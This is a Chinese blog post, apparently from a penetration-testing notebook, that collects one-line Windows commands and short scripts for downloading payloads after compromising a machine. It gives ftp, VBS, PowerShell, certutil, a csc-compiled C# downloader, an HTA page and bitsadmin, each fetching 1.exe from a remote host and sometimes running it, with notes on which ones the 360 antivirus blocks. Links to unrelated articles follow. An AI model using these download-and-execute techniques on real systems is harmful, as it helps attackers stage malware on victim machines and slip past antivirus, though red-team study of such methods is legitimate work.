利用ftp来下载payload文件

echo open 192.168.1.1 21> ftp.txt

echo ftp>> ftp.txt

echo bin >> ftp.txt

echo ftp>> ftp.txt

echo GET 1.exe >> ftp.txt

ftp -s:ftp.txt

后记:这个我没有实验成功太菜了

利用vbs来下载payload

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.1.1/1.exe",0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

aGet.SaveToFile "C:\test\1.exe",2

后记:这个已经利用成功了,网上说可以用script来执行,可能win10上面没有,但是可以直接双击运行,或者命令行里面直接使用,vbs脚本后缀为vbs

利用Powershell来下载payload

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'

后记:是在命令行中执行以上命令

利用certutil下载文件

直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看缓存certutil.exe -urlcache *

至于这个缓存有什么用就不知道了
后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存),360会拦截

利用CSC(windows的c#编译器)来下载文件

1.cs文件内容

using System.Net;

namespace downloader

{

    class Program

    {

        static void Main(string[] args)

        {

            WebClient client = new WebClient();

            string URLAddress = @"http://192.168.1.1/1.exe";

            string receivePath = @"C:\test\";

            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName

        (URLAddress));

        }

    }

}

后记:csc.exe位于C:\Windows\Microsoft.NET\Framework\v2.0.50727。因为未加入环境变量中所以需要指定路径。
使用方式:C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\download.exe C:\test\1.cs
这样1.cs就会被编辑为exe文件,我们运行一下就会把文件下载下来了,360会进行拦截,估计是捕获了下载的时候的流量了,因为并不是直接就拦截了

hta下载文件

将下列代码保存至.hta文件

<html>

<head>

<script>

var Object = new ActiveXObject("MSXML2.XMLHTTP");

Object.open("GET","http://192.168.1.1/1.exe",false);

Object.send();

if (Object.Status == 200)

{

    var Stream = new ActiveXObject("ADODB.Stream");

    Stream.Open();

    Stream.Type = 1;

    Stream.Write(Object.ResponseBody);

    Stream.SaveToFile("C:\\test\\1.exe", 2);

    Stream.Close();

}

window.close();

</script>

<HTA:APPLICATION

WINDOWSTATE = "minimize">

</head>

<body>

</body>

</html>

后记:直接双击运行既可或者命令行直接执行,360会拦截

利用bitsadmin下载文件

bitsadmin是一个控制台工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe

后记:不支持https/ftp协议,php/python自带的服务器会报错,360会拦截

总结,其实感觉Windows上可以玩的东西比Linux多,使用的也比Linux多,这可能也是红蓝对抗偏向于这边的原因吧

一句话下载总结(用于后渗透上传payload)的更多相关文章

  1. android 拍照或者图库选择 压缩后 图片 上传

    通过拍照或者从相册里选择图片通过压缩并上传时很多应用的常用功能,记录一下实现过程 一:创建个临时文件夹用于保存压缩后需要上传的图片 /** * path:存放图片目录路径 */ private Str ...

  2. tomcat重启或关闭后,上传文件消失 .

    tomcat重启或关闭后,上传文件消失的问题,是因为在断电前myeclipse是启动的,断电时造成myeclipse异常关闭,再重新启动myeclipse时会重新发布项目,把先前发布的项目给覆盖了,所 ...

  3. 程序windows上可以上传附件,部署到 linux服务器后出现 “上传目录 不可写” 怎么解决?

    这样的问题一般都是linux  下文件读写权限引起的,用 shell  命名到上传附件的目录(如 cd /data/www/project/upload/),然后执行 shell 文件权限设置: 例如 ...

  4. JIRA恢复备份后无法上传附件

    1.在恢复JIRA 备份数据和附件后,上传附件失败,这一般是恢复附件时没有修改附件的拥有者和组 创建JIRA平台,会自动创建一个服务器的账户,如果是服务器第一次部署JIRA那么账户肯定是jira,如果 ...

  5. 加固后,上传play store, 在 google play store 下载应用安装后,打开签名校验失败

    在Google Play Console. (Google Play App Signing )签署您的应用 在创建应用时: 会有个“ Google Play App Signing” 的东西,提示使 ...

  6. 使用springMVC实现文件上传和下载之环境配置与上传

    最近的项目中用到了文件的上传和下载功能,任务分配给了其他的同时完成.如今项目结束告一段落,我觉着这个功能比较重要,因此特意把它提取出来自己进行了尝试. 一. 基础配置: maven导包及配置pom.x ...

  7. 用SpringMVC实现的上传下载方式二(多文件上传)

    参考来源:      http://blog.csdn.net/qq_32953079/article/details/52290208 1.导入相关jar包 commons-fileupload.j ...

  8. SecureCRT上传、下载文件 使用rz【上传】& sz【下载】命令

    首先安装:apt-get install lrzsz SecureCRT这款SSH客户端软件同时具备了终端仿真器和文件传输功能.比ftp命令方便多了,而且服务器不用再开FTP服务了.rz,sz是便是L ...

  9. 视频(其他)下载+tomcat 配置编码+图片上传限制大小

    视频下载:前台 jsp function downVideo(value,row,index){ return '<a href="<%=basePath%>admin/v ...

随机推荐

  1. taro-安装及使用-npm

    taro-安装及使用 https://nervjs.github.io/taro/docs/GETTING-STARTED.html 安装 Taro 项目基于 node,请确保已具备较新的 node ...

  2. React中Class的概念

    Class的概念 一.简介 javaScript是面向对象的编程语言,可以说所以的能够被描述的事.物或抽象的东西,都是可以是对象.而我们记录的对象,会有具有同样的属性和行为. 为了节省重写相同的代码. ...

  3. 【基础】Pipeline

    1. 参考的优秀文章 Request/Response protocols and RTT 2. 来源 原来,系统中一个树结构的数据来源是Redis,由于数据增多.业务复杂,查询速度并不快.究其原因, ...

  4. webpack 添加eslint代码审查

    1). 添加包 npm install eslint --save-dev npm install eslint-loader --save-dev npm install eslint-plugin ...

  5. html标签中的 MIME 类型

    1.<script type="text/x-template">  MIME 类型 2.MIME类型是什么 : http://www.w3school.com.cn/ ...

  6. /etc/fstab修改及mkfs(e2label)相关应用与疑问

    http://blog.chinaunix.net/uid-23392298-id-62318.html 我们将以问题开始说明: 案例: 由于n年前的误操作,导致系统启动的时候,提示如下错误:Coul ...

  7. flask 的orm

    https://www.cnblogs.com/chichung/p/9794702.html

  8. 4. Python数据类型之数字、字符串、列表

    开发过程中,我们需要处理文本.图形.音频.视频.网页等各种各样的数据,不同的数据,需要定义不同的数据类型.在Python中,能够直接处理的数据类型主要有以下几种:数字.字符串.列表.元组.字典.集合等 ...

  9. qemu源码分析

    参考:http://lists.gnu.org/archive/html/qemu-devel/2011-04/pdfhC5rVdz7U8.pdf 1. qemu与Bochs的区别: 1. Bochs ...

  10. Xen的半虚拟化(Paravirtualization)

    三个特权级 IA-32体系提供了4个特权级别,正常情况下只用了2个, 操作系统运行在Ring 0,而应用程序运行在Ring 3. Xen让自己运行在Ring 0, 而操作系统运行在Ring 1, 应用 ...